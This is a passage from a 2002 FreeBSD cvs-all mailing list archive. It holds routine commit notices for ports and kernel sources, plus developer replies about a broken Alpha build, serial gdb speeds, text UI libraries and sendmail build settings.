Supervisor && Kernel), but Unix only used User && Kernel. Other 11s only had User && Kernel mode. The 11/70 also had split I&D, so you could use the mfpi/mtpi instructions to move to/from instruction space. This is what made both system calls and character I/O so damned expensive for Unix- you had to move bytes/words in/out one at a time because the user and kernel really had vastly different and disjoint address spaces. For a beginning programmer, it was also like seeing a black hole for the first time to look at the code and wonder "where the heck are the bytes going to/coming from?". The concept of having a pointer decode/dererence in one address space with the source or result being in another seemed like somebody had invented perpetual motion. Sigh. I was lachrymous over time when computers seemed fun. Well, I gotta go load 177650 into my PC and toggle the run switch.... -matt To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 5:19:24 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 57DCB37B401; Thu, 20 Jun 2002 05:19:22 -0700 (PDT) Received: (from nectar@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5KCJM673909; Thu, 20 Jun 2002 05:19:22 -0700 (PDT) (envelope-from nectar) Message-Id: <200206201219.g5KCJM673909@freefall.freebsd.org> From: Jacques Vidrine Date: Thu, 20 Jun 2002 05:19:22 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/mail/courier-imap Makefile ports/mail/courier-imap/files patch-rfc822_parsedt.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG nectar 2002/06/20 05:19:22 PDT Modified files: mail/courier-imap Makefile Added files: mail/courier-imap/files patch-rfc822_parsedt.c Log: Fix DoS. Revision Changes Path 1.31 +1 -1 ports/mail/courier-imap/Makefile 1.1 +10 -0 ports/mail/courier-imap/files/patch-rfc822_parsedt.c (new) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 5:51:31 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 677EA37B40C; Thu, 20 Jun 2002 05:51:27 -0700 (PDT) Received: (from nyan@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5KCpRm77595; Thu, 20 Jun 2002 05:51:27 -0700 (PDT) (envelope-from nyan) Message-Id: <200206201251.g5KCpRm77595@freefall.freebsd.org> From: Takahashi Yoshihiro Date: Thu, 20 Jun 2002 05:51:27 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/release/scripts dokern.sh X-FreeBSD-CVS-Branch: RELENG_4 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG nyan 2002/06/20 05:51:27 PDT Modified files: (Branch: RELENG_4) release/scripts dokern.sh Log: Remove the em driver from small mfsroot floppy. Revision Changes Path 1.23.2.30 +2 -1 src/release/scripts/dokern.sh To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 5:51:54 2002 Delivered-To: cvs-all@freebsd.org Received: from day.anthologeek.net (day.anthologeek.net [213.91.4.139]) by hub.freebsd.org (Postfix) with ESMTP id 8E31E37B415; Thu, 20 Jun 2002 05:51:37 -0700 (PDT) Received: by day.anthologeek.net (Postfix, from userid 1000) id A98E117139; Thu, 20 Jun 2002 14:50:33 +0200 (CEST) Date: Thu, 20 Jun 2002 14:50:33 +0200 From: Sameh Ghane To: "David W. Chapman Jr." Cc: Mark Murray , cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: Re: cvs commit: src/gnu/usr.bin Makefile Message-ID: <20020620145033.A60700@anthologeek.net> References: <200205162010.g4GKAAp66509@green.bikeshed.org> <01e501c1fd16$39d3bc50$f800a8c0@dwcjr> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <01e501c1fd16$39d3bc50$f800a8c0@dwcjr>; from dwcjr@inethouston.net on Thu, May 16, 2002 at 03:14:04PM -0500 X-PGP-Keys: 0x1289F00D: Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Le (On) Thu, May 16, 2002 at 03:14:04PM -0500, David W. Chapman Jr. ecrivit (wrote): > > > > > > > > I could kluge up a script if folks want one. > > > > > > I would definitely use it. > > > > Does it go in the ports... or in the base system? ;-) > > > http://people.freebsd.org/~markm/l33t_perl_removal_script.pl or a port. The URL is now b0rken. Any other URL for this script ? What about the port ? Cheers, -- Sameh To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 6:22: 2 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 1FE0D37B40F; Thu, 20 Jun 2002 06:21:59 -0700 (PDT) Received: (from sheldonh@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5KDLxi84443; Thu, 20 Jun 2002 06:21:59 -0700 (PDT) (envelope-from sheldonh) Message-Id: <200206201321.g5KDLxi84443@freefall.freebsd.org> From: Sheldon Hearn Date: Thu, 20 Jun 2002 06:21:58 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: doc/en_US.ISO8859-1/books/handbook/pgpkeys chapter.sgml pgpkeys.ent sheldonh.key X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG sheldonh 2002/06/20 06:21:58 PDT Modified files: en_US.ISO8859-1/books/handbook/pgpkeys chapter.sgml pgpkeys.ent Added files: en_US.ISO8859-1/books/handbook/pgpkeys sheldonh.key Log: Add my key to the handbook. Revision Changes Path 1.160 +5 -0 doc/en_US.ISO8859-1/books/handbook/pgpkeys/chapter.sgml 1.35 +1 -0 doc/en_US.ISO8859-1/books/handbook/pgpkeys/pgpkeys.ent 1.1 +39 -0 doc/en_US.ISO8859-1/books/handbook/pgpkeys/sheldonh.key (new) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 7: 3:40 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id C773237B403; Thu, 20 Jun 2002 07:03:36 -0700 (PDT) Received: (from iedowse@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5KE3aj88669; Thu, 20 Jun 2002 07:03:36 -0700 (PDT) (envelope-from iedowse) Message-Id: <200206201403.g5KE3aj88669@freefall.freebsd.org> From: Ian Dowse Date: Thu, 20 Jun 2002 07:03:36 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/kern tty.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG iedowse 2002/06/20 07:03:36 PDT Modified files: sys/kern tty.c Log: Display the mutex name in the ^T status line if the selected thread is blocked on a mutex. Prepend a '*' to distinguish this case as is done in top(1). Revision Changes Path 1.182 +3 -2 src/sys/kern/tty.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 7: 9: 6 2002 Delivered-To: cvs-all@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id ADED037B405; Thu, 20 Jun 2002 07:09:00 -0700 (PDT) Received: by flood.ping.uio.no (Postfix, from userid 2602) id CAF475361; Thu, 20 Jun 2002 16:08:58 +0200 (CEST) X-URL: http://www.ofug.org/~des/ X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated. To: Nick Hibma Cc: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: Re: cvs commit: src/sys/pc98/pc98 sio.c src/sys/conf options options.i386 options.ia64 options.pc98 src/sys/dev/sio sio.c sioreg.h References: <200206182130.g5ILUbI13355@freefall.freebsd.org> From: Dag-Erling Smorgrav Date: 20 Jun 2002 16:08:57 +0200 In-Reply-To: <200206182130.g5ILUbI13355@freefall.freebsd.org> Message-ID: Lines: 24 User-Agent: Gnus/5.0808 (Gnus v5.8.8) Emacs/21.2 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Nick Hibma writes: > Log: > Make the speed used by gdb over serial settable in the kernel configuration. > > This facilitates the use in circumstances where you are using a serial > console as well. GDB doesn't support anything higher than 9600 baud (19k2 > if you are lucky), but the console does. This breaks sio on Alpha: cc -c -O -pipe -mcpu=ev56 -Wall -Wredundant-decls -Wnested-externs -Wstrict-prototypes -Wmissing-prototypes -Wpointer-arith -Winline -Wcast-qual -Wno-format -ansi -g -nostdinc -I- -I. -I../../.. -I../../../dev -I../../../contrib/dev/acpica -I../../../contrib/ipfilter -I../../../../include -D_KERNEL -include opt_global.h -fno-common -mno-fp-regs -ffixed-8 -Wa,-mev56 -ffreestanding -Werror ../../../dev/sio/sio.c ../../../dev/sio/sio.c: In function `siogdbgetc': ../../../dev/sio/sio.c:3218: `dev' undeclared (first use in this function) ../../../dev/sio/sio.c:3218: (Each undeclared identifier is reported only once ../../../dev/sio/sio.c:3218: for each function it appears in.) ../../../dev/sio/sio.c: In function `siogdbputc': ../../../dev/sio/sio.c:3245: `dev' undeclared (first use in this function) *** Error code 1 Stop in /usr/src/sys/alpha/compile/DSA. DES -- Dag-Erling Smorgrav - des@ofug.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 7:15:58 2002 Delivered-To: cvs-all@freebsd.org Received: from h132-197-179-27.gte.com (h132-197-179-27.gte.com [132.197.179.27]) by hub.freebsd.org (Postfix) with ESMTP id 62B6737B406; Thu, 20 Jun 2002 07:15:48 -0700 (PDT) Received: from kanpc.gte.com (localhost [IPv6:::1]) by h132-197-179-27.gte.com (8.12.4/8.12.4) with ESMTP id g5KEFkRj098146; Thu, 20 Jun 2002 10:15:47 -0400 (EDT) (envelope-from ak03@kanpc.gte.com) Received: (from ak03@localhost) by kanpc.gte.com (8.12.4/8.12.4/Submit) id g5KEFiof098103; Thu, 20 Jun 2002 10:15:44 -0400 (EDT) Date: Thu, 20 Jun 2002 10:15:43 -0400 From: Alexander Kabaev To: "Greg 'groggy' Lehey" Cc: bde@zeta.org.au, n_hibma@FreeBSD.ORG, cvs-all@FreeBSD.ORG Subject: Re: Serial gdb speeds (was: cvs commit: src/sys/pc98/pc98 sio.c src/sys/conf options options.i386 options.ia64 options.pc98 src/sys/dev/sio sio.c sioreg.h) Message-Id: <20020620101543.2b2da668.ak03@gte.com> In-Reply-To: <20020620010300.GB91720@wantadilla.lemis.com> References: <200206182130.g5ILUbI13355@freefall.freebsd.org> <20020619153032.X7788-100000@gamplex.bde.org> <20020620010300.GB91720@wantadilla.lemis.com> Organization: Verizon Data Services X-Mailer: Sylpheed version 0.7.8claws6 (GTK+ 1.2.10; i386-portbld-freebsd5.0) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG I was using gdb over the 11500 bps serial line between two very -current boxes just yesterday night. Whatever has crept in just has to be hardware configuration specific, because I never seen this problem with any of my PCs. On Thu, 20 Jun 2002 10:33:00 +0930 "Greg 'groggy' Lehey" wrote: > Correct. It seems to have crept in round the time of the migration to > the SMPng code. Since then, I haven't been able to use serial gdb > reliably at speeds higher than 9600 bps. > > Greg > -- > See complete headers for address and phone numbers > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe cvs-all" in the body of the message -- Alexander Kabaev To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 7:26:38 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 1511137B405; Thu, 20 Jun 2002 07:26:32 -0700 (PDT) Received: (from skv@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5KEQVN94883; Thu, 20 Jun 2002 07:26:31 -0700 (PDT) (envelope-from skv) Message-Id: <200206201426.g5KEQVN94883@freefall.freebsd.org> From: Sergey Skvortsov Date: Thu, 20 Jun 2002 07:26:31 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/devel/p5-POE Makefile distinfo pkg-plist X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG skv 2002/06/20 07:26:31 PDT Modified files: devel/p5-POE Makefile distinfo pkg-plist Log: Update to 0.21 Revision Changes Path 1.9 +2 -1 ports/devel/p5-POE/Makefile 1.8 +1 -1 ports/devel/p5-POE/distinfo 1.8 +1 -0 ports/devel/p5-POE/pkg-plist To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 7:48: 0 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id C521737B40C; Thu, 20 Jun 2002 07:47:48 -0700 (PDT) Received: (from dirk@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5KElmW96988; Thu, 20 Jun 2002 07:47:48 -0700 (PDT) (envelope-from dirk) Message-Id: <200206201447.g5KElmW96988@freefall.freebsd.org> From: Dirk Froemberg Date: Thu, 20 Jun 2002 07:47:48 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/databases/mysql323-server Makefile distinfo ports/databases/mysql323-server/files patch-af patch-ag patch-an patch-ap patch-as X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG dirk 2002/06/20 07:47:48 PDT Modified files: databases/mysql323-server Makefile distinfo databases/mysql323-server/files patch-af patch-ag patch-an Removed files: databases/mysql323-server/files patch-ap patch-as Log: Upgrade to 3.23.51. Revision Changes Path 1.136 +3 -6 ports/databases/mysql323-server/Makefile 1.61 +1 -1 ports/databases/mysql323-server/distinfo 1.11 +5 -5 ports/databases/mysql323-server/files/patch-af 1.15 +57 -43 ports/databases/mysql323-server/files/patch-ag 1.5 +5 -5 ports/databases/mysql323-server/files/patch-an 1.3 +0 -11 ports/databases/mysql323-server/files/patch-ap (dead) 1.3 +0 -16 ports/databases/mysql323-server/files/patch-as (dead) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 7:56:15 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 224A337B439; Thu, 20 Jun 2002 07:55:54 -0700 (PDT) Received: (from sobomax@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5KEtst98000; Thu, 20 Jun 2002 07:55:54 -0700 (PDT) (envelope-from sobomax) Message-Id: <200206201455.g5KEtst98000@freefall.freebsd.org> From: Maxim Sobolev Date: Thu, 20 Jun 2002 07:55:53 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/bin/ps ps.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG sobomax 2002/06/20 07:55:53 PDT Modified files: bin/ps ps.c Log: Don't try to decode old-style options if the argv[1] begins with `-' and the second character represents some option taking an argument. This fixes problem when ps(1) is invoked for examply as follows: $ ps -Ufoobar1234 the above example results in option string being interpreted as -U foobarp1234 - note extra `p'. Reported by: Vladimir Sotnikov MFC after: 2 weeks Revision Changes Path 1.55 +28 -10 src/bin/ps/ps.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 8:17:57 2002 Delivered-To: cvs-all@freebsd.org Received: from mail1.qc.uunet.ca (mail1.qc.uunet.ca [198.168.54.16]) by hub.freebsd.org (Postfix) with ESMTP id 26D1E37B403; Thu, 20 Jun 2002 08:17:44 -0700 (PDT) Received: from xtanbul ([216.94.147.34]) by mail1.qc.uunet.ca (8.10.2/8.10.2) with ESMTP id g5KFHZN03671; Thu, 20 Jun 2002 11:17:35 -0400 Date: Thu, 20 Jun 2002 11:14:01 -0400 Reply-To: libh@FreeBSD.ORG Mime-Version: 1.0 (Apple Message framework v482) Cc: Giorgos Keramidas , Ying-Chieh Liao , cvs-all@FreeBSD.ORG, committers@FreeBSD.ORG Message-Id: <5A40FF38-8460-11D6-887B-0050E4A0BB3F@anarcat.ath.cx> In-Reply-To: <20020620080409.GA84197@fallin.lv> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Subject: Re: Differences of tvision and rhtvision (was: Re: cvs commit: ports/devel ...) From: Antoine Beaupre Content-Transfer-Encoding: quoted-printable To: Hye-Shik Chang , Max Okumoto , libh@FreeBSD.ORG X-Mailer: Apple Mail (2.482) Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Le jeudi 20 juin 2002, =E0 04:04 AM, Hye-Shik Chang a =E9crit : > On Thu, Jun 20, 2002 at 08:58:42AM +0300, Giorgos Keramidas wrote: >> On 2002-06-17 11:35 +0000, Ying-Chieh Liao wrote: >>> ijliao 2002/06/17 11:35:25 PDT >>> >>> Modified files: >>> devel Makefile >>> Added files: >>> devel/rhtvision Makefile distinfo pkg-comment pkg-descr >>> pkg-plist >>> Log: >>> add rhtvision 1.1.4 >>> Complete C++ Text User Interface (TUI) library >> >> Do we know what the differences of rhtvision and tvision are? >> Just asking here, since I was thinking of installing tvision >> when I saw this commitlog. >> >> - Giorgos >> > > according http://tvision.sf.net/ : > > =3D=3D rhtvision =3D=3D > This port is a port of the C++ version for the DOS, FreeBSD, Linux,=20 > QNX, Solaris and Win32 platforms. The port isn't 100% compatible with=20= > the original version from Borland because we want a library better = than=20 > the original and not with the limititations imposed by the original 16=20= > bits version and the huge security holes that are unacceptable. > > =3D=3D tvision =3D=3D > Sergio Sigala made a port to Linux and FreeBSD with "100% of=20 > compatibility with the old version" as goal. The v0.8 of this port can=20= > be found in Sunsite. Ewww.. I guess that misc/libh must be ported to rhtvision then. ;) > Regards, Many thanks, > -- > Hye-Shik Chang > Yonsei University, Seoul > ^D A. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 8:28:48 2002 Delivered-To: cvs-all@freebsd.org Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id B4B2C37B407; Thu, 20 Jun 2002 08:28:40 -0700 (PDT) Received: from fledge.watson.org (localhost [127.0.0.1]) by fledge.watson.org (8.12.3/8.12.3) with ESMTP id g5KFSdsh017259; Thu, 20 Jun 2002 11:28:39 -0400 (EDT) (envelope-from arr@watson.org) Received: from localhost (arr@localhost) by fledge.watson.org (8.12.3/8.12.3/Submit) with SMTP id g5KFSdhZ017256; Thu, 20 Jun 2002 11:28:39 -0400 (EDT) X-Authentication-Warning: fledge.watson.org: arr owned process doing -bs Date: Thu, 20 Jun 2002 11:28:38 -0400 (EDT) From: "Andrew R. Reiter" To: Doug Rabson Cc: "Andrew R. Reiter" , cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: Re: cvs commit: src/sys/kern kern_linker.c In-Reply-To: <200206201000.13151.dfr@nlsystems.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Thu, 20 Jun 2002, Doug Rabson wrote: :On Wednesday 19 June 2002 10:25 pm, Andrew R. Reiter wrote: :> arr 2002/06/19 14:25:59 PDT :> :> Modified files: :> sys/kern kern_linker.c :> Log: :> - Remove the lock(9) protecting the kernel linker system. :> - Added a mutex, kld_mtx, to protect the kernel_linker system. Note that :> while ``classes'' is global (to that file), it is only read only after :> SI_SUB_KLD, SI_ORDER_ANY. :> - Add a SYSINIT to flip a flag that disallows class registration after :> SI_SUB_KLD, SI_ORDER_ANY. : :What about classes that are loaded later? : There now exists a flag in linker_add_class() that disallows this. Cheers, -- Andrew R. Reiter arr@watson.org arr@FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 8:35:17 2002 Delivered-To: cvs-all@freebsd.org Received: from horsey.gshapiro.net (horsey.gshapiro.net [209.220.147.178]) by hub.freebsd.org (Postfix) with ESMTP id EDB1037B406; Thu, 20 Jun 2002 08:35:13 -0700 (PDT) Received: from horsey.gshapiro.net (gshapiro@localhost [IPv6:::1]) by horsey.gshapiro.net (8.12.4/8.12.4) with ESMTP id g5KFZDLW004052 (version=TLSv1/SSLv3 cipher=EDH-RSA-DES-CBC3-SHA bits=168 verify=NO); Thu, 20 Jun 2002 08:35:13 -0700 (PDT) Received: (from gshapiro@localhost) by horsey.gshapiro.net (8.12.4/8.12.4/Submit) id g5KFZDIF004049; Thu, 20 Jun 2002 08:35:13 -0700 (PDT) MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-ID: <15633.63025.19329.57495@horsey.gshapiro.net> Date: Thu, 20 Jun 2002 08:35:13 -0700 From: Gregory Neil Shapiro To: Doug Barton Cc: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: Re: cvs commit: src/share/examples/etc make.conf src/share/man/man5make.conf.5 In-Reply-To: <3D1194D6.993AB531@FreeBSD.org> References: <200206200433.g5K4X6N80308@freefall.freebsd.org> <3D1194D6.993AB531@FreeBSD.org> X-Mailer: VM 7.03 under 21.1 (patch 14) "Cuyahoga Valley" XEmacs Lucid Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG >> Add a warning regarding the SENDMAIL_*_MC make.conf variable values. >> Using /etc/mail/sendmail.mc will create /etc/mail/sendmail.cf during >> a buildworld. DougB> Ummm.... we've never allowed buildworld to install files... I don't DougB> think we should start making exceptions to this. Are there other DougB> solutions possible? That is exactly why I added the warning. I could also have the Makefile give an error and abort the buildworld. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 8:47:23 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id CA31A37B40A; Thu, 20 Jun 2002 08:47:17 -0700 (PDT) Received: (from robert@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5KFlHE08114; Thu, 20 Jun 2002 08:47:17 -0700 (PDT) (envelope-from robert) Message-Id: <200206201547.g5KFlHE08114@freefall.freebsd.org> From: Robert Drehmel Date: Thu, 20 Jun 2002 08:47:17 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/svr4 svr4_misc.c X-FreeBSD-CVS-Branch: RELENG_4 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG robert 2002/06/20 08:47:17 PDT Modified files: (Branch: RELENG_4) sys/svr4 svr4_misc.c Log: MFC: Pass the correct arguments to the chgproccnt() function. Revision Changes Path 1.13.2.3 +1 -1 src/sys/svr4/svr4_misc.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 8:52:15 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 65AE637B404; Thu, 20 Jun 2002 08:52:07 -0700 (PDT) Received: (from robert@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5KFq7108781; Thu, 20 Jun 2002 08:52:07 -0700 (PDT) (envelope-from robert) Message-Id: <200206201552.g5KFq7108781@freefall.freebsd.org> From: Robert Drehmel Date: Thu, 20 Jun 2002 08:52:07 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/svr4 svr4_misc.c X-FreeBSD-CVS-Branch: RELENG_4 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG robert 2002/06/20 08:52:07 PDT Modified files: (Branch: RELENG_4) sys/svr4 svr4_misc.c Log: The cr_ruidinfo member of struct ucred does not exist in RELENG_4. Revision Changes Path 1.13.2.4 +1 -1 src/sys/svr4/svr4_misc.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 8:57:47 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 01FCB37B40A; Thu, 20 Jun 2002 08:57:43 -0700 (PDT) Received: (from naddy@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5KFvgN09082; Thu, 20 Jun 2002 08:57:42 -0700 (PDT) (envelope-from naddy) Message-Id: <200206201557.g5KFvgN09082@freefall.freebsd.org> From: Christian Weisgerber Date: Thu, 20 Jun 2002 08:57:42 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/math/calcoo Makefile distinfo X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG naddy 2002/06/20 08:57:42 PDT Modified files: math/calcoo Makefile distinfo Log: Update to 1.3.10. Changes: In the RPN mode, the keys to swap registers X and Z, and X and T have been replaced with keys to scroll the stack. Revision Changes Path 1.8 +1 -1 ports/math/calcoo/Makefile 1.7 +1 -1 ports/math/calcoo/distinfo To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 8:59:44 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 0FE9237B404; Thu, 20 Jun 2002 08:59:41 -0700 (PDT) Received: (from des@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5KFxfV09311; Thu, 20 Jun 2002 08:59:41 -0700 (PDT) (envelope-from des) Message-Id: <200206201559.g5KFxfV09311@freefall.freebsd.org> From: Dag-Erling Smorgrav Date: Thu, 20 Jun 2002 08:59:40 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/news/inn-stable Makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG des 2002/06/20 08:59:40 PDT Modified files: news/inn-stable Makefile Log: Upgrade to 2.3.20020620. Revision Changes Path 1.86 +2 -1 ports/news/inn-stable/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 9: 0:19 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 9B71837B404; Thu, 20 Jun 2002 09:00:03 -0700 (PDT) Received: (from des@localhost) by freefall.freebsd.org 